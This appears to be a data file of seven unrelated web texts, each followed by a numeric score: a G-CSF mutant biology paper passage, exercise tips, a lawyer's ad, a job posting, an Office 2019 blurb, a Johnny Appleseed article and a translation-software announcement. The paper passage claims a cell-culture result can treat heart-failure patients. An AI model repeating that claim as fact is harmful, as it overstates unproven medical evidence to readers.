(13) , Mut #3 and #4 hG-CSFs with this feature did not perform significantly different from WT hG-CSF ( Fig. 1 C and 2 B). Human G-CSF has another short helix structure, but with 4 anti-parallel helices. The short helix is involved in major binding with G-CSF receptor (G-CSFR) (29) ; therefore, a mutation in this region disrupts the interaction between G-CSF and G-CSFR. Mut #3 (Gly51Asn) may have failed to promote proliferation in H9c2 cells ( Fig. 2 ) because it was positioned within this short helix structure. Mut #4 (Pro60Asn), on the other hand, appears to have changed the structure of hG-CSF by removing a proline (Pro, P), which has an aliphatic side chain that is vital for determining the proper folding structure of the protein. Therefore, a mutation in this residue (Mut #4: Pro60Asn) may abolish the original structure of hG-CSF such that the changed hG-CSF does not bind to G-CSFR. This would explain why Mut #4 did not significantly increase the viability of H9c2 cells ( Fig. 2 ). Regulation of apoptotic proteins in H9c2 cells treated with Mut #5. (A) Comparison of Bcl-xL expression at 24 and 48 h upon 400 ng/ml WT and Mut #5 hG-CSF; histogram showed the band intensities in the lower panel. M indicates H9c2 cells treated with CHO cell culture media transfected with empty vector. Asterisks (*) indicate values that were significantly different (P < 0.05) from those of WT. (B) Results from real-time RT-PCR investigating expression of Bcl-2 and Bcl-xL at 24 h (white) and 48 h (black). Single symbols (# for 24 h and * for 48 h) indicate P < 0.05 in a comparison with M. Double symbols (**) indicate P < 0.05 in a comparison with WT and Mut #5. (C) Results from real-time RT-PCR for Bcl-2 and Bcl-xL expression in cells that were (black) or were not (white) treated with H2O2. Single symbols (#untreatment; *, H2O2) indicate P < 0.05 in a comparison with M. Double symbol (**) indicates P < 0.05 in a comparison with WT and Mut #5. GAPDH and β-actin were used as internal controls. (D) Results from H2O2-induced caspase 3 activity in the control (M) and in cells treated with either 400 ng/ml WT or Mut #5 hG-CSF. M means H9c2 cells treated with the culture media transfected with empty vector. F.I. means fold increase compared to M. Single asterisks (*) indicate P < 0.05 in a comparison with M, and double asterisks (**) indicate P < 0.05 in a comparison between WT and Mut #5. (E) Identification of PARP cleavage (cleaved fragment: 89 kDa) upon 400 ng/ml WT and Mut #5 hG-CSF. Numbers below the bands are ratios indicating the intensities between upper and lower bands. Actin was used as the loading control. Visualization of apoptotic activity in cells treated with Mut #5. (A) Results from flow cytometry analysis used to visualize the amount of apoptotic activity in the control (M), WT, and Mut #5 hG-CSF cells stained with Annexin V and PI. The histogram in the lower panel provides a comparison between the total number of apoptotic cells (black and gray bars) and surviving cells (white bars). (B) Results from the FACS analysis comparing the number of live (M1, white bars) and dead (M2, black bars) cells among the 3 treatments. Mut #5 was associated with higher levels of Bcl-x L and Bcl-2 in both the presence and absence of H 2 O 2 ( Fig. 3 ). Bcl-x L is a downstream molecule in the ERK and AKT pathway activated by the hematopoietic growth factor macrophage-CSF (M-CSF) (30) . Upregulation of this molecule is associated with the inhibition of apoptosis. Similarly, Bcl-2 also has anti-apoptotic activities and, like Bcl-x L , can be activated via the JAK/STAT3 pathway (4) . Although the current study did not explicitly show activation of JAK/STAT pathways, the upregulation of both Bcl-x L and Bcl-2 in the presence of Mut #5 suggests that this mutant is capable of inhibiting myocardial cell death. Reperfusion is a reliable treatment to diminish heart injury caused by myocardial ischemia (31) . However, this treatment induces side effects mediated by reactive oxygen species (ROS) such as hydrogen peroxide, and activates the transcription of proinflammatory genes (e.g., PARP-1) that are cleaved by caspase 3 (32) . The PARP inhibitor PJ-34 can alleviate problems associated with heart disease, and reduces doxorubicin-induced apoptosis of cardiomyocytes (33) . Because of this, PARP-1 null mice have been used as an animal model in numerous experiments investigating heart failure (31) . We found that Mut #5 also down-regulates caspase 3 activity and PARP cleavage in response to H 2 O 2 treatment ( Fig. 3 ). Therefore, a newly developed hG-CSF (Phe140Asn) will be further employed for studying heart failure using this animal model. In this study, we have shown that Mut #5 exerts higher anti-apoptotic effect than WT hG-CSF against H 2 O 2 -induced apoptosis in H9c2 cardiomyocytes. This illustrates the significance of N -glycosylation in determining the functionality of cytokines and glycoproteins. In the future, we hope to provide a more detailed characterization of the glycans present in Phe140Asn. For now, however, we conclude that Mut #5 can be used to effectively and economically treat patients with heart failure. Detailed information is described in Supplementary Material. This work received grant support from the Agenda Program (No.PJ006702) and Next-Generation BioGreen21 Program (PJ008169), Rural Development Administration, Republic of Korea. This study was supported by the 2010 Post-Doctoral Course Program of National Institute of Animal Science, Rural Development Administration, Republic of Korea. HK Chung , EM Ko , SW Kim , SJ Byun , HJ Chung , M Kwon , HC Lee , BC Yang , DW Han , JK Park , SG Hong , WK Chang , and KW Kim , “Antiapoptotic effects of Phe140Asn, a novel human granulocyte colony-stimulating factor mutant in H9c2 rat cardiomyocytes”, BMB Reports, vol. 12, no. 12, Dec 2012.
0.99773
What are the warning signs to watch out for during exercise? Are some exercises more dangerous than others? Is it okay to exercise outside in cold weather? Do I need to drink water during a physical activity? How do I choose the right footwear? All of these activities require a great amount of muscle strength, and after repeating the same movement a number of times, you can become very out of breath and feel weak. Pay attention and remember to gauge your intensity by asking yourself whether you are able to talk and whether you have reached your limits. These activities are not contraindicated, but it is highly recommended that you take regular breaks and pay close attention to how you feel as you perform these tasks. When it's cold outside, your heart has to pump blood to your extremities to keep you warm, which means that your resting heart rate increases. It's not really the cold temperature but rather the wind that makes it more difficult to exercise outside. Putting a scarf around your mouth to warm up the air you breathe in can help you stay outside longer. However, if you are still feeling the chill, move your exercise indoors. You don't have to brave all types of weather to get a workout. The same goes for heat waves; you should avoid exercising in hot weather and instead opt for an air-conditioned environment. A stress test consists of walking on a treadmill to determine your exercise capacity. This test is used to detect any problems that may arise during exercise. Based on the results, a personalized physical activity program can be created for you. Yes, active muscles generate heat during physical exertion, which raises your core temperature. In fact, the body becomes a veritable furnace. The main way it gets rid of excess heat is through the evaporation of sweat on the surface of the skin. This sweating mechanism controls body temperature but also leads to significant losses in water and salt. It is therefore essential that you drink water before, during and after exercise to replace lost fluids and avoid the symptoms of dehydration, which include fatigue, decreased performance, slight headache, dizziness and nausea. For each 15-minute session of moderate physical activity, you should drink 150 ml of water. Drinking regularly before you are thirsty is a good habit to adopt. Once you start feeling thirsty, your body has already started to become dehydrated. Adequate hydration also allows the body to recover faster. There are a wide range of sports shoes on the market. The key is to buy shoes that are comfortable and right for your chosen activity. If you want to go jogging, you need good jogging shoes; if you want to do power walking, you need good walking shoes, etc. If you play a number of different sports, you need to get multi-sport shoes that are suitable for all of your activities. Keep these shoes for exercise only to make them last longer and prevent early wear and tear of the soles and padding. It is also recommended that you change your shoes regularly to protect your joints.
0.948474
I’m Ed Smith, an Antelope car accident lawyer. As of the beginning of 2017, there were 26,484,646 licensed drivers in California with more than 34 million vehicles registered. This was a sizable increase over the previous year. One of the problems associated with more vehicles on the road is the increased risk of a car accident. driver error and may include overcorrecting, fatigued driving, drinking and driving or distracted driving. Ways to avoid single vehicle accidents include obeying traffic laws and the rules of the road. Rear-end collisions: The National Highway Traffic Safety Administration (NHTSA) reports that such collisions account for about 29 percent of motor vehicle accidents. These may be caused by inattention, speeding or tailgating. Maintaining a safe distance between your vehicle and the one ahead, leaving your cell phone turned off and obeying traffic laws can help. Head-on collisions: These types of collisions are more dangerous than other types because they commonly occur on highways where both vehicles are moving at high speed. Alcohol consumption or drugs and wrong-way drivers are often the cause. Traveling in the slow lane can help in some cases since wrong-way drivers almost always move into the fast lane. It also gives you the opportunity to take an evasive action in this situation. Merging vehicles: Vehicles that are trying to merge into traffic, particularly on freeways, can be subject to poor timing and crash into another vehicle already traveling in the lane. Using extra caution when merging can help prevent this type of accident. Multi-car collisions: These types of accidents are more common in congested highway traffic or in bad weather conditions when one vehicle makes an emergency stop or slows suddenly. One way to help avoid multi-car crashes is to maintain a reasonable following distance between vehicles, so the vehicle behind has time to take evasive maneuvers, adjust their speed or stop. Get medical treatment: If anyone at the accident site was badly injured, it is necessary to call 911 and request emergency transportation to the hospital. If you or others are not badly injured, it is vital that you see a doctor as soon as possible after the accident. This is important for two reasons. It documents how you were injured and allows a physician to review any injuries you have and provide you with information about what to look for in the days ahead. Some injuries will not become symptomatic for up to 72 hours such as a cervical sprain. Information from others: Ask for contact information from drivers as well as witnesses. Get insurance information from other drivers involved in the crash as well as registration and driver’s license numbers. Insurance company: You are required to notify your insurance carrier after an accident. However, you are not obligated to answer questions other than where the accident happened. Rather than answer questions at this vulnerable time, you can instruct the representative that they can talk to your auto accident lawyer in the future. Take pictures: Use your cell phone to take pictures of the accident scene. Capture the placement of the vehicles as well as roadway marks such as skid marks. This information will go a long way in determining how the accident happened. It’s important to do this before the accident site is cleared, making it impossible to obtain this information later on. Call the police: The police may or may not come to the accident site, depending on the type of accident. If they do, make sure to get the law enforcement officer’s name and a copy of the police accident report. Keep the clothes you were wearing: They may be offered as proof of injury later on. I’m Ed Smith, an Antelope car accident lawyer. When you or a family member is involved in a car accident, it can cause serious injuries and resulting medical bills and other expenses. If this happened to you, give me a call at (916) 921-6400. I am honored to offer you compassionate, friendly and free advice. Outside the 916 area code, call (800) 404-5400. Since 1982, I’ve been able to help residents of Antelope and Northern California with car and truck accidents as well as traumatic brain injuries and wrongful death. As a Million Dollar Advocates member, I join other trial attorneys with one million dollar verdicts/settlements for their former clients. Visit our Settlements and Verdicts page for information on some of our past cases and their results.
0.913648
Lead a team of up to 8 sales reps to execute the sales and marketing plan for the assigned territory and deliver the monthly and annual sales targets. 1. Deliver the monthly sales targets. 2. Achieve availability of our products in wholesale and retail outlets that is at the same level of our main competitors. 3. Work with our dealers and retailers to activate our products at the point of sale. 4. Identify, create and execute opportunities with dealers/retailers to increase sell-in/sell-out. 5. Supervise, coach and train the team on the job to better sell and merchandize our products. 1. Provide weekly/monthly sales forecasts for the assigned territory. 2. Execute the sales and marketing plan for the territory as agreed with the Region Sales Manager. 3. Develop strong relationships and close collaboration with all dealers. 4. Monitor dealers’ turnover and stocks on a weekly basis and ensure that our SKUs are available and that the dealers reach their monthly targets. 5. Develop and execute action plans in case the dealer falls behind on his/her monthly target. 6. Identify and recruit new customers, both, in wholesale and retail. 7. Remit all cash collected on behalf of the dealer to the dealer without fail. 8. Raise orders and invoices; confirm dealer’s payment for new orders. 9. Co-ordinate with the Logistics/Warehouse team to ensure that goods are delivered within 24 hours. 10. Manage, control and secure assets (like vans assigned to dealers, POS materials, etc). 11. Ensure the disciplined execution of the SR’s daily/weekly call plan. 12. Keep track of actual calls versus calls scheduled; productive calls versus actual calls made. 13. Ensure that SRs perform daily reconciliation of dealer stocks sold through redistribution. 14. Develop and execute a training plan for the team (together with the Region Sales Manager). 15. Monitor the team’s performance and provide feedback to them on a regular basis. 16. Work together with representatives from the community to enhance our reputation. 17. Work together with the Marketing team to execute and track activities in the territory. Experience: Minimum of 5 years in Sales; preferably in a Fast Moving Consumer Goods company. • Building a sales plan for the territory (customer/outlet mapping, call/route plan, volume planning). • Proficiency in executing “Steps of the Call” and in building strong relationships with customers. • Information tracking, analysis and preparing for presentation. • Exerting personal influence for initiating action steps and execution of a plan. • Decision-making and demonstrating self-confidence. • Strong customer focus and negotiating skills.
0.999923
The essentials for businesses that need desktop Office applications for PC. Office Standard 2019 includes Outlook, Word, Excel, PowerPoint, and Publisher. Office 2019 is a one-time purchase for installation on each licensed device or each licensed user's devices. You'll also have access to web versions of Word, OneNote, Excel, and PowerPoint. Administrative tools allow admins to deploy software to many users at once with volume activation, centrally control computers and user accounts with group policy, and take control of a remote computer or virtual machine over a network connection with terminal services. Plus, make decisions with app telemetry, an automated remote measurement and collection of data that you can turn into useful analytics.
0.999289
This article is about the historical figure. For the film, see Johnny Appleseed (film). John Chapman (September 26, 1774 – March 18, 1845), better known as Johnny Appleseed, was an American pioneer nurseryman who introduced apple trees to large parts of Pennsylvania, Ontario, Ohio, Indiana, and Illinois, as well as the northern counties of present-day West Virginia. He became an American legend while still alive, due to his kind, generous ways, his leadership in conservation, and the symbolic importance he attributed to apples. He was also a missionary for The New Church (Swedenborgian) and the inspiration for many museums and historical sites such as the Johnny Appleseed Museum in Urbana, Ohio, and the Johnny Appleseed Heritage Center in Ashland County, Ohio.[A] The Fort Wayne TinCaps, a minor league baseball team in Fort Wayne, Indiana, where Chapman spent his final years, is named in his honor. Chapman was born on 26 September 1774, in Leominster, Massachusetts, the second child of Nathaniel and Elizabeth Chapman (née Simonds, married February 8, 1770). His birthplace has a granite marker, and the street is called Johnny Appleseed Lane. Chapman's mother, Elizabeth, died in 1776 shortly after giving birth to a second son, Nathaniel Jr., who died a few days later. His father, Nathaniel, who was in the military, returned in 1780 to Longmeadow, Massachusetts where, in the summer of 1780, he married Lucy Cooley. According to some accounts, an 18-year-old John persuaded his 11-year-old brother Nathaniel Cooley Chapman to go west with him in 1792. The duo apparently lived a nomadic life until their father brought his large family west in 1805 and met up with them in Ohio. The younger Nathaniel decided to stay and help their father farm the land. Shortly after the brothers parted ways, John began his apprenticeship as an orchardist under a Mr. Crawford, who had apple orchards, thus inspiring his life's journey of planting apple trees. There are stories of Johnny Appleseed practicing his nurseryman craft in the area of Wilkes-Barre, Pennsylvania, and of picking seeds from the pomace at Potomac cider mills in the late 1790s. Another story has Chapman living in Pittsburgh on Grant's Hill in 1794 at the time of the Whiskey Rebellion. The popular image is of Johnny Appleseed spreading apple seeds randomly everywhere he went. In fact, he planted nurseries rather than orchards, built fences around them to protect them from livestock, left the nurseries in the care of a neighbor who sold trees on shares, and returned every year or two to tend the nursery. He planted his first nursery on the bank of Brokenstraw Creek, south of Warren, Pennsylvania. Next, he seems to have moved to Venango County, along the shore of French Creek, but many of these nurseries were in the Mohican area of north-central Ohio. This area included the towns of Mansfield, Lisbon, Lucas, Perrysville, and Loudonville. According to Harper's New Monthly Magazine, toward the end of his career he was present when an itinerant missionary was exhorting an open-air congregation in Mansfield, Ohio. The sermon was long and severe on the topic of extravagance, because the pioneers were buying such indulgences as calico and imported tea. "Where now is there a man who, like the primitive Christians, is traveling to heaven barefooted and clad in coarse raiment?" the preacher repeatedly asked until Johnny Appleseed, his endurance worn out, walked up to the preacher, put his bare foot on the stump that had served as a podium, and said, "Here's your primitive Christian!" The flummoxed sermonizer dismissed the congregation. He preached the gospel as he traveled, and during his travels he converted many Native Americans, whom he admired. The Native Americans regarded him as someone who had been touched by the Great Spirit, and even hostile tribes left him strictly alone. In a story collected by Eric Braun, he had a pet wolf that had started following him after he healed its injured leg. More controversially, he also planted dogfennel during his travels, believing that it was a useful medicinal herb. It is now regarded as a noxious, invasive weed. According to another story, he heard that a horse was to be put down, so he bought the horse, bought a few grassy acres nearby, and turned it out to recover. When it did, he gave the horse to someone needy, exacting a promise to treat it humanely. During his later life, he was a vegetarian. He never married. He thought he would find his soulmate in heaven if she did not appear to him on earth. In Fort Wayne, on Tuesday, 18th, inst John Chapman, commonly known by the name of Johnny Appleseed, about 70 years of age. Many of our citizens will remember this eccentric individual, as he sauntered through town eating his dry rusk and cold meat, and freely conversing on the mysteries of his religious faith. He was a devoted follower of Emanuel Swedenborg, and notwithstanding his apparent poverty, was reputed to be in good circumstances. On the same day in this neighborhood, at an advanced age, Mr. John Chapman (better known as Johnny Appleseed). The deceased was well known through this region by his eccentricity, and the strange garb he usually wore. He followed the occupation of a nurseryman, and has been a regular visitor here upwards of 10 years. He was a native of Pennsylvania we understand but his home—if home he had—for some years past was in the neighborhood of Cleveland, where he has relatives living. He is supposed to have considerable property, yet denied himself almost the common necessities of life—not so much perhaps for avarice as from his peculiar notions on religious subjects. He was a follower of Swedenborg and devoutly believed that the more he endured in this world the less he would have to suffer and the greater would be his happiness hereafter—he submitted to every privation with cheerfulness and content, believing that in so doing he was securing snug quarters hereafter. In the most inclement weather he might be seen barefooted and almost naked except when he chanced to pick up articles of old clothing. Notwithstanding the privations and exposure he endured, he lived to an extreme old age, not less than 80 years at the time of his death—though no person would have judged from his appearance that he was 60. "He always carried with him some work on the doctrines of Swedenborg with which he was perfectly familiar, and would readily converse and argue on his tenets, using much shrewdness and penetration. Steven Fortriede, director of the Allen County Public Library (ACPL) and author of the 1978 Johnny Appleseed, believes that another gravesite is the correct site, in Johnny Appleseed Park in Fort Wayne,. Johnny Appleseed Park is a Fort Wayne city park that adjoins Archer Park, an Allen County park. Archer Park is the site of John Chapman's grave marker and used to be a part of the Archer family farm. The Worth family attended First Baptist Church in Fort Wayne, according to records at ACPL, which has one of the nation's top genealogy collections. According to an 1858 interview with Richard Worth Jr., Chapman was buried "respectably" in the Archer cemetery, and Fortriede believes that use of the term "respectably" indicates that Chapman was buried in the hallowed ground of Archer cemetery instead of near the cabin where he died. The historical account of his death and burial by the Worths and their neighbors, the Pettits, Goinges, Porters, Notestems, Parkers, Beckets, Whitesides, Pechons, Hatfields, Parrants, Ballards, Randsells, and the Archers in David Archer's private burial grounds is substantially correct. The grave, more especially the common head-boards used in those days, have long since decayed and become entirely obliterated, and at this time I do not think that any person could with any degree of certainty come within fifty feet of pointing out the location of his grave. Suffice it to say that he has been gathered in with his neighbors and friends, as I have enumerated, for the majority of them lie in David Archer's graveyard with him. The Johnny Appleseed Commission Council of the City of Fort Wayne reported, "[A]s a part of the celebration of Indiana's 100th birthday in 1916 an iron fence was placed in the Archer graveyard by the Horticulture Society of Indiana setting off the grave of Johnny Appleseed. At that time, there were men living who had attended the funeral of Johnny Appleseed. Direct and accurate evidence was available then. There was little or no reason for them to make a mistake about the location of this grave. They located the grave in the Archer burying ground." Johnny Appleseed left an estate of over 1,200 acres (490 ha) of valuable nurseries to his sister. He also owned four plots in Allen County, Indiana, including a nursery in Milan Township with 15,000 trees, and two plots in Mount Vernon, Ohio. He bought the southwest quarter (160 acres) of section 26, Mohican Township, Ashland County, Ohio, but he did not record the deed and lost the property. Fort Wayne, Indiana, is the location of Johnny Appleseed's death. A memorial in Fort Wayne's Swinney Park purports to honor him but not to mark his grave. In Fort Wayne, since 1975, the Johnny Appleseed Festival has been held the third full weekend in September in Johnny Appleseed Park and Archer Park. Musicians, demonstrators, and vendors dress in early-19th-century attire and offer food and beverages that would have been available then. In 2008 the Fort Wayne Wizards, a minor league baseball club, changed their name to the Fort Wayne TinCaps. The first season with the new name was in 2009. That same year the Tincaps won their only league championship. The name "Tincaps" is a reference to the tin hat (or pot) Johnny Appleseed is said to have worn. Their team mascot is also named "Johnny." A memorial in Spring Grove Cemetery in Cincinnati, Ohio is on the summit of the grounds in Section 134. A circular garden surrounds a large stone upon which a bronze statue of Chapman stands, face looking skywards, holding an apple seedling tree in one hand and a book in the other. A bronze cenotaph identifies him as Johnny Appleseed with a brief biography and eulogy. March 11 and September 26 are sometimes celebrated as Johnny Appleseed Day. The September date is Appleseed's acknowledged birthdate, but the March date is sometimes preferred because it is during planting season. Johnny Appleseed Elementary School is a public school in Leominster, Massachusetts, his birthplace. Mansfield, Ohio, one of Appleseed's stops in his peregrinations, was home to Johnny Appleseed Middle School until it closed in 1989. A large terracotta sculpture of Johnny Appleseed, created by Viktor Schreckengost, decorates the front of the Lakewood High School Civic Auditorium in Lakewood, Ohio. Although the local board of education deemed Appleseed too "eccentric" a figure to grace the front of the building, renaming the sculpture simply "Early Settler," students, teachers, and parents alike still call the sculpture by its intended name: "Johnny Appleseed." Urbana University, in Urbana, Ohio, maintains one of two Johnny Appleseed Museums in the world, which is open to the public. The Johnny Appleseed Educational Center and Museum hosts a number of artifacts, including a tree that is believed to have been planted by Johnny Appleseed. They also provide a number of services for research, including a national registry of Johnny Appleseed's relatives. In 2011 the museum was renovated and updated. The educational center and museum was founded on the belief that those who have the opportunity to study the life of Johnny Appleseed will share his appreciation of education, our country, the environment, peace, moral integrity and leadership. Oooooh, the Lord is good to me, and so I thank the Lord, for giving me the things I need, the sun and the rain and the appleseed. The Lord is good to me. Amen, Amen, Amen, Amen, Amen. Many books and films have been based on the life of Johnny Appleseed. One notable account is from the first chapter of The Botany of Desire: A Plant's-Eye View of the World by Michael Pollan. Pollan states that since Johnny Appleseed was against grafting, his apples were not of an edible variety and could be used only for cider: "Really, what Johnny Appleseed was doing and the reason he was welcome in every cabin in Ohio and Indiana was he was bringing the gift of alcohol to the frontier. He was our American Dionysus." One of the more successful films was Melody Time, the animated 1948 film from Walt Disney Studios featuring Dennis Day. The Legend of Johnny Appleseed, a 19-minute segment, tells the story of an apple farmer who sees others going west, wistfully wishing he was not tied down by his orchard, until an angel appears, singing an apple song, setting Johnny on a mission. When he treats a skunk kindly, all animals everywhere thereafter trust him. The cartoon featured lively tunes, and a childlike simplicity of message. This animated short was included in Disney's American Legends, a compilation of four animated shorts. Supposedly, the only surviving tree planted by Johnny Appleseed is on the farm of Richard and Phyllis Algeo of Nova, Ohio. Some marketers claim it is a Rambo, more than a century before John Chapman was born. Some even make the claim that the Rambo was "Johnny Appleseed's favorite variety", ignoring that he had religious objections to grafting and preferred wild apples to all named varieties. It appears most nurseries are calling the tree the "Johnny Appleseed" variety, rather than a Rambo. Unlike the mid-summer Rambo, the Johnny Appleseed variety ripens in September and is a baking-applesauce variety similar to an Albemarle Pippin. Nurseries offer the Johnny Appleseed tree as an immature apple tree for planting, with scions from the Algeo stock grafted on them. Orchardists do not appear to be marketing the fruit of this tree. References to Johnny Appleseed abound in popular culture. He appears in Neil Gaiman's American Gods as a friend of Algonquin trickster Whiskey Jack (Wisakedjak). Rock bands NOFX, Guided by Voices, and Joe Strummer and the Mescaleros have all released songs titled "Johnny Appleseed", as have Grammy-winning American pastoral duo Eric Tingstad and Nancy Rumbel. "Johnny Appleseed" also featured in a comic series in The Victor in the UK in the early sixties. In Philip Roth's novel American Pastoral, the central character imagines himself as Johnny Appleseed when he moves from Newark to a rural community; in this case the figure stands for an innocent, childlike version of the American pioneer spirit. The Japanese role-playing game Wild Arms 5 mentions Johnny Appleseed as a central figure in the plotline. Apple Inc. uses a "Johnny Appleseed" character as a placeholder name in many of its recent advertisements, video tutorials, and keynote presentation examples; this was also the alias of Mike Markkula under which he published several programs for the Apple II. "John Appleseed" also appears as a contact in many of Apple, inc.'s application demonstrations. The name appears on the caller ID, as a sender in "mail" application demonstrations and screenshots and also in the icons of the "TextEdit" and "Logic Pro X" application. Shelley Duvall's Tall Tales & Legends featured Johnny Appleseed, as played by Martin Short, in 1986. Also featuring Rob Reiner as Jack Smith and Molly Ringwald as his niece Jenny, the story—while entertaining—takes considerable liberties with the original tall tale. Robert A. Heinlein's science fiction novel Farmer in the Sky, which depicts future colonists on Ganymede and takes up consciously many of the themes of the 19th-century American frontier and homesteading, also includes a character who is known as "Johnny Appleseed" and, like the historical one, is involved in planting and spreading apple trees. John Clute's science fiction novel Appleseed (2001) centers on a character who may (or may not) be the immortal John Chapman. John Chapman and his brother Nathaniel are characters in Alice Hoffman's novel The Red Garden. They appear in the chapter "Eight Nights of Love"—passing through the small town of Blackwell, where they plant an orchard but also the Tree of Life in the center of said town, a tree said to bloom and bear fruit in midwinter. In Hoffman's book, John has a brief relationship with a young woman called Minette Jacob, who was about to hang herself after having lost her husband, child, mother, and sister, but who regains the joy of life after meeting the brothers. In the beginning of the chapter the author hints that John was reading Swedenborg's pamphlets, and later in the novel, the characters actually refer to him as Johnny Appleseed. The residents call the variety of apples "Blackwell Look-No-Further." ^ Between Lucas, and Mifflin, Ohio. ^ a b c "John Chapman". Swedenborg.org. Archived from the original on May 17, 2015. Retrieved June 6, 2015. ^ "Johnny Appleseed Education Center & Museum". Urbana.edu. Retrieved June 6, 2015. ^ "The Johnny Appleseed Outdoor Drama". Archived from the original on November 28, 1999. Retrieved September 5, 2006. ^ "Scout.com: Fort Wayne no longer the Wizards". www.scout.com. Retrieved June 7, 2017. ^ Means, Howard (2011). Johnny Appleseed: The Man, the Myth, the American Story. New York: Simon & Schuster. p. 19. ISBN 1439178259. ^ "The Next Page: A People's History of Pittsburgh (Selected shorts)". Pittsburgh Post-Gazette. ^ "John Chapman". Pabook.libraries.psu.edu. Archived from the original on May 6, 2015. Retrieved June 6, 2015. ^ "Johnny Appleseed: A Pioneer Hero,". Harper's New Monthly Magazine. No. XLIII. 1871. pp. 830–831. Retrieved October 8, 2018. . Full text of "Johnny Appleseed: a pioneer hero" at the Internet Archive. ^ Kacirk, Jeffrey (1997). Forgotten English. New York: William Morrow & Co. ISBN 0-688-15018-7. ^ Howe, Henry (1903). Richland County. Howe's Historical Collections of Ohio (485), New York:Dover. ^ Braun, Eric (August 28, 2014). Johnny Appleseed Planted Trees Across the Land. Dustin Burkes-Larranaga (Illustrator). Capstone Press. ISBN 9781479554454. ^ a b "Johnny Appleseed: A Pioneer Hero". Harper's New Monthly Magazine (XLIII): 835. 1871. ^ Hillis, Newell Dwight (1917). The Quest of John Chapman: The Story of a Forgotten Hero. The Macmillan Company. p. 308. ISBN 1481996614. ^ Silverman, Ray (2012). The Core of Johnny Appleseed: The Unknown Story of a Spiritual Trailblazer. Pennsylvania: Swedenborg Foundation Press. p. 73. ASIN B011MFBNRK. ISBN 978-0-87785-345-9. ^ "Obituaries". The Fort Wayne Sentinel. 67 (81). March 22, 1845. ^ a b c d Kilbane, Kevin (September 18, 2003). "Researcher finds slice of Johnny Appleseed's life that may prove his burial spot". The News-Sentinel. Archived from the original on October 19, 2003. Retrieved September 8, 2006. ^ "Man and Myth" (PDF). Archived from the original (PDF) on September 5, 2006. Retrieved August 18, 2006. ^ "The Straight Dope: What's the story with Johnny Appleseed?". Straightdope.com. Retrieved June 6, 2015. ^ "The John Chapman, Johnny Appleseed, memorial was erected in his memory and is in Swinney Park". Contentdm.acpl.lib.in.us. Retrieved June 6, 2015. ^ "Johnny Appleseed Festival". Johnnyappleseedfest.com. Retrieved June 6, 2015. ^ "5 cent Johnny Appleseeed stamp" (JPEG) (Image). Retrieved October 18, 2017 – via Pinterest. ^ "Johnny Appleseed". Archived from the original on February 2, 2008. Retrieved January 2, 2008. ^ "National Apple Museum". nationalapplemuseum.com. ^ Mae Beringer. "The Memory of Johnny Appleseed Lives On". Cornell University. ^ A search on "Subject: Johnny Appleseed" in category books at Amazon.com, September 5, 2007, shows 116 items. ^ Pollan, Michael (2001). The Botany of Desire: A Plant's-Eye View of the World. Random House. ISBN 0-375-50129-0. Retrieved March 11, 2014. ^ "Author Michael Pollan Talks About the History of the Apple". Morning Edition (NPR). ^ "My Name Is Johnny Appleseed". Americantowns.com. Retrieved June 6, 2015. ^ planktonrules (May 27, 1948). "The Legend of Johnny Appleseed (1948)". IMDb. ^ "Kootenai National Forest - Home" (PDF). Fs.fed.us. Retrieved June 6, 2015. ^ "Virginia Apple Growers Association". Virginiaapples.org. Retrieved June 6, 2015. ^ Gaiman, Neil (2001). American Gods. New York: William Morrow. ISBN 0-380-97365-0. ^ Eric Tingstad & Nancy Rumbel (October 25, 1990). Legends (Audio CD). Narada. ASIN B000005OXY. ^ "Exactly what it says on the Text Edit icon." Macformat.co.uk. October 30, 2007. Archived from the original on November 9, 2007. Retrieved December 10, 2007. ^ Apple Confidential 2.0: The Definitive History of the World's Most Colorful Company, Page 4, ISBN 1-59327-010-0. William Kerrigan, Johnny Appleseed and the American Orchard: A Cultural History. Baltimore, MD: johns Hopkins University Press, 2012. "Johnny Appleseed: A Pioneer Hero" from Harper's Magazine, November 1871. "Johnny Appleseed Trail in North Central MA" Donald Greyfield (January 1, 2001). "John 'Johnny Appleseed' Chapman". Folk Hero and Patriot. Find a Grave. Retrieved August 18, 2011. This page is based on the Wikipedia article Johnny Appleseed; it is used under the Creative Commons Attribution-ShareAlike 3.0 Unported License (CC-BY-SA). You may redistribute it, verbatim or modified, providing that you comply with the terms of the CC-BY-SA.
0.93088
We are excited to announce the release of our second feature powered by artificial intelligence, Machine Translation Quality Estimation (MTQE). Using MTQE, you can see MT quality scores before any post-editing is done, removing the guesswork from MT and improving post-editing efficiency. The feature can be used with over 70 language pairs and is available for all 25+ MT engines supported in Memsource and in all Memsource editions. To use the feature you will need to purchase characters. Initial testing indicates that for the supported language pairs, MTQE can provide quality scores of between 85%-100% in up to 14% of segments that are machine translated. In practical terms, this could mean up to 7% of savings on post-editing costs. Machine translation quality continues to improve and linguists are increasingly being asked to edit, or post-edit, machine translation output. But machine translation quality still varies considerably depending on various factors, including content type and language pairs. Linguists have to sift their way through a lot of low-quality machine translation, occasionally coming across something that only requires a bit of editing or none at all. This wastes a lot of time. We know that linguists are saving time with quality scores for translation memory matches so why not provide the same for machine translation. This is where AI, and our AI team, came in. Our AI team looked into the historical translations where MT post-editing was used and based on the required post-editing effort, assigned the MT match a quality score. Our deep neural network was then trained with the historical data and thus learned how to accurately assign scores to a suggested MT output with any given source text. Review quality of MT output in Memsource: The instant MT quality scores allow linguists to factor MT quality into the post-editing process and better manage low-quality machine translation which can increase post-editing efficiency. Produce faster translations: With high-quality MT output, which receives a 100% score, post-editing may not be required at all. Estimate post-editing effort and time: MTQE allows for a predictive analysis of MT performance with specific content. The resulting data can help assess post-editing effort and be used to create more competitive translation quotes. Assess quality of MT engines: MTQE can be used to review the quality of MT engines for specific content so the engine with the highest quality scores can be selected. No score: When there is no score, this means MTQE cannot identify the quality so the output needs to be checked by a linguist. Running an analysis with MTQE enabled will calculate the number of MT matches (think of these in the same way as translation memory matches) with scores of 85%, 95%, or 100% in the file. By expanding the 100%, 99-95% and 94-85% sections of the analysis table, users can see a breakdown of which matches are returned from translation memory (TM), which are from non-translatables (NT), and which are MT matches (outlined in red). Machine translation, along with the quality score, is provided in two ways. First, in real-time, segment by segment within the Memsource Web Editor and Desktop Editor (shown above). Second, via the Pre-translation feature which allows batch pre-translation with a number of options. In the pre-translation settings, there is now the option to confirm 100% machine translation matches right away (as shown below).
0.994811
